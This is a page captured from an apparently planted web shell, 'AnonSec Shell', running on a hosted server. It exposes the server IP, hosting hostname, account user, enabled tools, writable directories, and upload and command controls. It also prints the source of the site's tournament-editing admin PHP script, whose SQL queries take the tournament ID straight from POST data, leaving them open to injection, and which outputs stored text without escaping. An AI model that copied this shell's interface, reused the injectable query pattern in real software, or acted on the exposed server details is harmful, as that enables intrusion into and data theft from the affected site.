AnonSec Shell
Server IP : 149.202.105.228  /  Your IP : 216.73.216.18
Web Server : Apache
System : Linux webm129.cluster030.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : atfycaf ( 116275)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/atfycaf/www/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/atfycaf/www/admin//knockoutEdit-2.php
<?php
$thisCheckID	= 5;
include "globalVars.php";

if (!isset($_POST["tournID"])) {
	header("Location:/admin/knockoutEdit.html");
} else {
	$tournamentID	= $_POST["tournID"];
}
$tournamentBasicsQuery = mysqli_query($conn, "SELECT tournTitle, tournStartDate, tournLocation FROM knockoutConfig WHERE id = '$tournamentID'");
while ($sQ = mysqli_fetch_array($tournamentBasicsQuery)) {
	$tournTitle		= $sQ["tournTitle"];
	$tournStartDate	= $sQ["tournStartDate"];
	$tStartMonth	=  date("F", strtotime($tournStartDate));
	$tStartYear		=  date("Y", strtotime($tournStartDate));
	$tournLocation	= $sQ["tournLocation"];
}
if (trim($tournTitle) == "") {
	$tournTitle	= "$tournLocation $tStartMonth $tStartYear";
}

include "header.php";
?>

		<h2>Update the <?php echo $tournTitle ?> Tournament - Page Content</h2>

				<div class="formContainer">
					<div class="functionButtons">
						<form action="knockoutEdit-1.html" method="post">
							<input type="hidden" name="tournID" value="<?php echo $tournamentID ?>" />
							<input type="submit" name="getLeague" value="Tournament Details" />
						</form>
						<form action="knockoutEdit-2.html" method="post">
							<input type="hidden" name="tournID" value="<?php echo $tournamentID ?>" />
							<input type="submit" class="functionSelected" name="getLeague" value="Page Content" />
						</form>
					</div>
				</div>
<?php
if (isset($_POST["saveIntro"])) {
	$pageText	= $_POST["pageText"];

	mysqli_query($conn, "UPDATE knockoutConfig SET pageText = '". addslashes($pageText) ."' WHERE id = '$tournamentID'");

	$trackDate		= date("Y-m-d H:i:s");
	mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/knockoutEdit-2.html', 'knockoutConfig', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; updated the page text of the knockout tournament ID: $tournamentID (". addslashes($tournTitle) .")')");

	echo "<p><strong>The changes to this league page have been saved.</strong></p>";
}

$knockoutTextQuery = mysqli_query($conn, "SELECT pageText FROM knockoutConfig WHERE id = '$tournamentID'");
while ($kTQ = mysqli_fetch_array($knockoutTextQuery)) {
	$pageText	= $kTQ["pageText"];
}
if (isset($_POST["finalised"])) {
	?>
	<p>The <?php echo $tournTitle ?> Tournament has been successfully added to the website.</p>
	<?php	
}
?>
    <form action="knockoutEdit-2.html" method="post">
		<input type="hidden" name="tournID" value="<?php echo $tournamentID ?>" />
		<div class="descStTab">
			<div class="pFormRow pFormTxtRow">
				<div class="pFormTitle">Tournament Introduction:</div>
			</div>
			<div class="pFormRow pFormTxtRow">
				<div id="pageText" class="tinyTxtEditor"><?php echo $pageText ?></div>
				<div class="pFormLabel">
					<label class="labelName">Tournament Introduction:</label>
				</div>
			</div>
		</div>
		<input type="submit" class="submitButton" name="saveIntro" value="Save Tournament Introduction" />
	</form>

<?php
include "footer.php";
?>

Anon7 - 2022
AnonSec Team